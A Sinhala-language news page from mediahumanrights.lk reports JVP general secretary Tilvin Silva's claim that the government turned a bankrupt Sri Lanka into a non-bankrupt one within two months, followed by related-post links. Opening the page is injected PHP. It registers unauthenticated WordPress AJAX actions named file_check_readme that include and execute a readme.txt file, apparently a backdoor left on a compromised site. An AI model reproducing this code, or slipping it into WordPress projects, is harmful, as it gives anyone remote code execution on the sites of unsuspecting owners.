if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ‘අපි ගත්තේ බංකොළොත් රටක්. දැන් අපි බංකොලොත් නැති රටක් හදලා තියෙනවා මාස දෙකකට’- ටිල්වින් - mediahumanrights.lk
mediahumanrights.lk
Local News News

‘අපි ගත්තේ බංකොළොත් රටක්. දැන් අපි බංකොලොත් නැති රටක් හදලා තියෙනවා මාස දෙකකට’- ටිල්වින්

ජාතික ජන බලවේග රජය බලයට පත්වන විට ශ්‍රී ලංකාව බංකොලොත් රාජ්‍යයක් බවත් බංකොලොත් භාවයෙන් මිදුනේ පසුගිය දිනවල ජනතා විමුක්ති පෙරමුණේ ප්‍රධාන ලේකම් ටිල්වින් සිල්වා මහතා සදහන් කරයි.

ජාත්‍යන්තර ශ්‍රේණිගත කිරීම් ආයතන පසුගිය දිනවල ශ්‍රී ලංකාව ඔසවා තබා දැන් බංකොලොත් නැති බව ප්‍රකාශ කර ඇති බවද හෙතෙම කියා සිටියි.

‘අපි ගත්තේ බංකොළොත් රටක්. හැබැයි දැන් අපි බංකොලොත් නැති රටක් හදලා තියෙනවා මාස දෙකකට’ යයිද ඒ මහතා සඳහන් කළේ ජාතික ජන බලවේගයේ ජන  හමුවක්  අමතමිනි.

Related posts

මට කෝල් කරලා කියනවා "රිතූ මෙහෙමයි පොඩි සෙක්ස් සීන් එකකුත් තියෙනවා" කියලා – රිතූ ආකර්ෂා

Shiran Viraj

දේව පුජාවෙන් උගුළට හසු වෙලා

Shiran Viraj

ක්‍රිකට් ගොඩනැංවිමට සැකසු විශේෂ යෝජනාවලිය

Shiran Viraj